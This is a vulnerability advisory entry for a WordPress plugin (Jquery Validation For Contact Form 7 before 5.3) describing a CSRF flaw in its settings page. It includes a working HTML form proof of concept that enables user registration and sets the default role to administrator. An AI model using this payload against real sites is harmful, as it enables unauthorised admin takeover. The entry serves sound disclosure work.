WordPress Plugin Vulnerabilities
Jquery Validation For Contact Form 7 < 5.3 - Arbitrary Options Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change Blog options like default_role, users_can_register via a CSRF attack
Proof of Concept
<form method="post" action="https://example.com/wordpress/wp-admin/admin.php?page=jvcf7">
<input type="hidden" name="blogname" value="Tested">
<input type="hidden" name="users_can_register" value="1">
<input type="hidden" name="default_role" value="administrator">
<input type="submit" name="save-jvcf7-options" value="Save Settings">
</form> Affects Plugins
Fixed in version 5.3
References
Classification
Miscellaneous
Original Researcher
Gibran Abdillah
Submitter
Gibran Abdillah
Verified
Yes
Timeline
Publicly Published
2022-06-27 (about 9 months ago)
Added
2022-06-27 (about 9 months ago)
Last Updated
2022-06-27 (about 9 months ago)